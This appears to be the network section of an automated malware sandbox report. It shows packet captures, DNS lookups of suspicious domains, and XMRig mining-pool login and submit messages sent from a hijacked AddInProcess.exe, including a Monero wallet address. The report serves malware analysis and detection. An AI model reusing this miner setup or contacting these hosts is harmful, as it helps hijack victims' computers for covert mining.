Sep 19, 2024 02:45:02.951306105 CEST	49957	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:03.009071112 CEST	39001	49956	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:03.127775908 CEST	39001	49957	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:03.128019094 CEST	49957	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:04.284168959 CEST	49957	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:04.513562918 CEST	39001	49957	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:04.513719082 CEST	49957	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:04.711030006 CEST	39001	49957	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:04.711287022 CEST	49957	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:04.711476088 CEST	49957	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:04.826035023 CEST	49958	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:04.888521910 CEST	39001	49957	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:05.003016949 CEST	39001	49958	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:05.003283024 CEST	49958	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:05.386356115 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:05.557372093 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:45:05.730792046 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:06.109019995 CEST	49958	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:06.336709976 CEST	39001	49958	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:06.336954117 CEST	49958	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:06.545114040 CEST	39001	49958	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:06.545303106 CEST	49958	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:06.545486927 CEST	49958	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:06.653568029 CEST	49959	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:06.722671986 CEST	39001	49958	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:06.860462904 CEST	39001	49959	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:06.860738993 CEST	49959	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:07.623965025 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:45:07.730331898 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:07.958859921 CEST	49959	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:08.167294979 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:08.328985929 CEST	39001	49959	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:08.329165936 CEST	49959	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:08.348681927 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:45:08.542649984 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:08.629070044 CEST	39001	49959	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:08.636459112 CEST	39001	49959	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:08.636648893 CEST	49959	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:08.636779070 CEST	49959	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:08.762476921 CEST	49960	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:08.811326981 CEST	39001	49959	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:08.944225073 CEST	39001	49960	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:08.944453955 CEST	49960	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:10.073976994 CEST	49960	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:10.329715967 CEST	39001	49960	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:10.329910040 CEST	49960	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:10.528343916 CEST	39001	49960	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:10.528661013 CEST	49960	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:10.528862953 CEST	49960	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:10.653343916 CEST	49961	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:10.703296900 CEST	39001	49960	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:10.843661070 CEST	39001	49961	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:10.843960047 CEST	49961	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:11.957360983 CEST	49961	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:11.989737034 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:12.209635973 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:12.209831953 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:12.235794067 CEST	39001	49961	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:12.236013889 CEST	49961	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:12.409677982 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:12.455043077 CEST	39001	49961	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:12.455245018 CEST	49961	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:12.455476999 CEST	49961	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:12.526170969 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:12.574156046 CEST	49962	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:12.636501074 CEST	39001	49961	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:12.703197956 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:12.705828905 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:12.759336948 CEST	39001	49962	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:12.759565115 CEST	49962	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:12.844417095 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:12.935508013 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:12.935802937 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:13.013590097 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:45:13.169852018 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:13.229098082 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:13.866278887 CEST	49962	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:14.123699903 CEST	39001	49962	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:14.124028921 CEST	49962	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:14.307370901 CEST	39001	49962	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:14.307652950 CEST	49962	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:14.307873964 CEST	49962	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:14.433656931 CEST	49963	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:14.482733965 CEST	39001	49962	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:14.612469912 CEST	39001	49963	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:14.612704039 CEST	49963	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:15.720427036 CEST	49963	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:16.014411926 CEST	39001	49963	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:16.014647961 CEST	49963	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:16.235743999 CEST	39001	49963	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:16.236052990 CEST	49963	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:16.236217022 CEST	49963	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:16.354434013 CEST	49964	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:16.412724018 CEST	39001	49963	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:16.539124012 CEST	39001	49964	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:16.539401054 CEST	49964	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:17.646091938 CEST	49964	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:18.014130116 CEST	39001	49964	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:18.014380932 CEST	49964	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:18.199435949 CEST	39001	49964	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:18.199681044 CEST	49964	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:18.199889898 CEST	49964	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:18.323600054 CEST	49965	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:18.376400948 CEST	39001	49964	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:18.504643917 CEST	39001	49965	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:18.504916906 CEST	49965	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:18.623789072 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:18.793211937 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:45:18.930897951 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:19.614383936 CEST	49965	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:20.013787985 CEST	39001	49965	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:20.014031887 CEST	49965	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:20.197180986 CEST	39001	49965	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:20.197334051 CEST	49965	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:20.197489023 CEST	49965	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:20.322709084 CEST	49966	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:20.372260094 CEST	39001	49965	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:20.524782896 CEST	39001	49966	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:20.525021076 CEST	49966	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:21.641844988 CEST	49966	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:21.919990063 CEST	39001	49966	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:21.920146942 CEST	49966	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:22.104644060 CEST	39001	49966	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:22.104873896 CEST	49966	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:22.105081081 CEST	49966	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:22.228429079 CEST	49967	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:22.295137882 CEST	39001	49966	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:22.403698921 CEST	39001	49967	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:22.403927088 CEST	49967	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:23.519207954 CEST	49967	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:23.748423100 CEST	39001	49967	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:23.748673916 CEST	49967	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:23.930099010 CEST	39001	49967	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:23.930412054 CEST	49967	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:23.930587053 CEST	49967	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:24.055917978 CEST	49968	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:24.105055094 CEST	39001	49967	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:24.230947971 CEST	39001	49968	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:24.231178999 CEST	49968	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:25.328200102 CEST	49968	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:25.623661041 CEST	39001	49968	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:25.623817921 CEST	49968	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:25.855386019 CEST	39001	49968	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:25.855588913 CEST	49968	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:25.855776072 CEST	49968	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:25.978775978 CEST	49969	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:26.030584097 CEST	39001	49968	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:26.156781912 CEST	39001	49969	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:26.157058954 CEST	49969	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:27.289612055 CEST	49969	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:27.623241901 CEST	39001	49969	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:27.623373032 CEST	49969	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:27.804543018 CEST	39001	49969	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:27.804723978 CEST	49969	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:27.804929972 CEST	49969	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:27.914299965 CEST	49970	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:27.979325056 CEST	39001	49969	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:28.097737074 CEST	39001	49970	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:28.097956896 CEST	49970	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:29.201396942 CEST	49970	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:29.515410900 CEST	39001	49970	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:29.515588999 CEST	49970	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:29.630546093 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:45:29.723202944 CEST	39001	49970	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:29.723407984 CEST	49970	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:29.723576069 CEST	49970	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:29.740942001 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:29.835769892 CEST	49971	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:29.904629946 CEST	39001	49970	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:30.013125896 CEST	39001	49971	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:30.013354063 CEST	49971	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:31.074486017 CEST	49971	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:31.295032024 CEST	39001	49971	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:31.295201063 CEST	49971	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:31.312376022 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:31.485580921 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:45:31.538381100 CEST	39001	49971	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:31.540420055 CEST	39001	49971	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:31.540591955 CEST	49971	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:31.540786982 CEST	49971	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:31.631181002 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:31.647701025 CEST	49972	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:31.717698097 CEST	39001	49971	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:31.825697899 CEST	39001	49972	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:31.825980902 CEST	49972	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:32.900121927 CEST	49972	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:33.128051043 CEST	39001	49972	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:33.128289938 CEST	49972	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:33.311563015 CEST	39001	49972	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:33.311796904 CEST	49972	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:33.312010050 CEST	49972	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:33.428745985 CEST	49973	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:33.486769915 CEST	39001	49972	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:33.603943110 CEST	39001	49973	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:33.604175091 CEST	49973	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:34.681704998 CEST	49973	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:34.904294014 CEST	39001	49973	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:34.904544115 CEST	49973	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:35.090487957 CEST	39001	49973	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:35.090774059 CEST	49973	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:35.090918064 CEST	49973	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:35.209561110 CEST	49974	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:35.265743971 CEST	39001	49973	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:35.388643026 CEST	39001	49974	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:35.388822079 CEST	49974	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:36.473026037 CEST	49974	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:36.826904058 CEST	39001	49974	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:36.827081919 CEST	49974	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:37.026034117 CEST	39001	49974	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:37.026282072 CEST	49974	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:37.026463032 CEST	49974	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:37.146562099 CEST	49975	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:37.204385996 CEST	39001	49974	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:37.321754932 CEST	39001	49975	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:37.322069883 CEST	49975	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:38.001286983 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:38.236813068 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:38.236993074 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:38.397593021 CEST	49975	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:38.420543909 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:38.613975048 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:38.638844967 CEST	39001	49975	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:38.639014006 CEST	49975	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:38.788727045 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:38.791254044 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:38.823045969 CEST	39001	49975	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:38.823271990 CEST	49975	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:38.823461056 CEST	49975	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:38.998512030 CEST	39001	49975	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:39.013691902 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:39.013823986 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:39.232645988 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:51.642540932 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:45:51.689047098 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:45:56.652584076 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:56.873055935 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:56.873305082 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:57.061328888 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:57.109766006 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:57.284770012 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:57.285475969 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:57.514471054 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:45:57.514606953 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:45:57.732553959 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:46:13.614403009 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:46:13.668432951 CEST	49845	80	192.168.11.30	142.202.242.43

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2024 02:41:39.097127914 CEST	60401	53	192.168.11.30	1.1.1.1
Sep 19, 2024 02:41:39.374372005 CEST	53	60401	1.1.1.1	192.168.11.30
Sep 19, 2024 02:41:42.166659117 CEST	58333	53	192.168.11.30	1.1.1.1
Sep 19, 2024 02:41:42.279927015 CEST	53	58333	1.1.1.1	192.168.11.30
Sep 19, 2024 02:41:47.919517040 CEST	53670	53	192.168.11.30	1.1.1.1
Sep 19, 2024 02:41:48.018490076 CEST	53	53670	1.1.1.1	192.168.11.30
Sep 19, 2024 02:42:03.643332958 CEST	63166	53	192.168.11.30	1.1.1.1
Sep 19, 2024 02:42:03.750086069 CEST	53	63166	1.1.1.1	192.168.11.30

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 19, 2024 02:41:39.097127914 CEST	192.168.11.30	1.1.1.1	0xebc8	Standard query (0)	strompreis.ru	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:41:42.166659117 CEST	192.168.11.30	1.1.1.1	0x3ff7	Standard query (0)	2x.si	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:41:47.919517040 CEST	192.168.11.30	1.1.1.1	0xae99	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:42:03.643332958 CEST	192.168.11.30	1.1.1.1	0x67d1	Standard query (0)	eemmbryequo.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 19, 2024 02:41:39.374372005 CEST	1.1.1.1	192.168.11.30	0xebc8	No error (0)	strompreis.ru	45.11.229.96	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:41:42.279927015 CEST	1.1.1.1	192.168.11.30	0x3ff7	No error (0)	2x.si	172.67.143.156	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:41:42.279927015 CEST	1.1.1.1	192.168.11.30	0x3ff7	No error (0)	2x.si	104.21.27.222	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:41:48.018490076 CEST	1.1.1.1	192.168.11.30	0xae99	No error (0)	pool.hashvault.pro	142.202.242.43	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:41:48.018490076 CEST	1.1.1.1	192.168.11.30	0xae99	No error (0)	pool.hashvault.pro	142.202.242.45	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:42:03.750086069 CEST	1.1.1.1	192.168.11.30	0x67d1	No error (0)	eemmbryequo.shop	172.67.142.26	A (IP address)	IN (0x0001)	false
Sep 19, 2024 02:42:03.750086069 CEST	1.1.1.1	192.168.11.30	0x67d1	No error (0)	eemmbryequo.shop	104.21.39.11	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

2x.si

eemmbryequo.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.30	49845	142.202.242.43	80	8596	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Timestamp	Bytes transferred	Direction	Data
Sep 19, 2024 02:41:48.171282053 CEST	568	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 33 69 39 58 71 65 62 44 69 36 63 58 56 31 41 45 44 4c 77 62 4a Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU","pass":"x","agent":"XMRig/6.21.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 ms
Sep 19, 2024 02:41:48.322782040 CEST	731	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 62 62 37 37 36 63 37 32 2d 32 34 33 33 2d 34 64 33 36 2d 62 65 39 37 2d 31 35 66 33 65 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"bb776c72-2433-4d36-be97-15f3ed831aca","job":{"blob":"1010b7e6adb706b63ea93fa2afe2eaf412484edbdb88c2a5a6123561e8a93e8e83420abbc7859400000000db27bf07b58c0202ab2b1e2fa088efe439495dcca7ca8c783cd
Sep 19, 2024 02:41:49.603667021 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 64 65 36 61 64 62 37 30 36 62 36 33 65 61 39 33 66 61 32 61 66 65 32 65 61 66 34 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cde6adb706b63ea93fa2afe2eaf412484edbdb88c2a5a6123561e8a93e8e83420abbc78594000000007a1ba347df1491b83cb328064529d6da2a3a7c893fad021f26a11c42fbdb65ab76","job_id":"77249c1d-8557-445f-a487-b86a8
Sep 19, 2024 02:41:59.054747105 CEST	255	OUT	Data Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 73 75 62 6d 69 74 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 62 62 37 37 36 63 37 32 2d 32 34 33 33 2d 34 64 33 36 2d 62 65 39 37 2d Data Ascii: {"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"bb776c72-2433-4d36-be97-15f3ed831aca","job_id":"77249c1d-8557-445f-a487-b86a893d10ca","nonce":"a1850100","result":"02fac9e37ed5d1ba3b86bbed9daad90fa0d239fef1235d182c3e80dabca60000","alg
Sep 19, 2024 02:41:59.233393908 CEST	71	IN	Data Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 2d 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 73 68 61 72 65 22 7d 7d 0a Data Ascii: {"id":2,"jsonrpc":"2.0","error":{"code":-1,"message":"Invalid share"}}
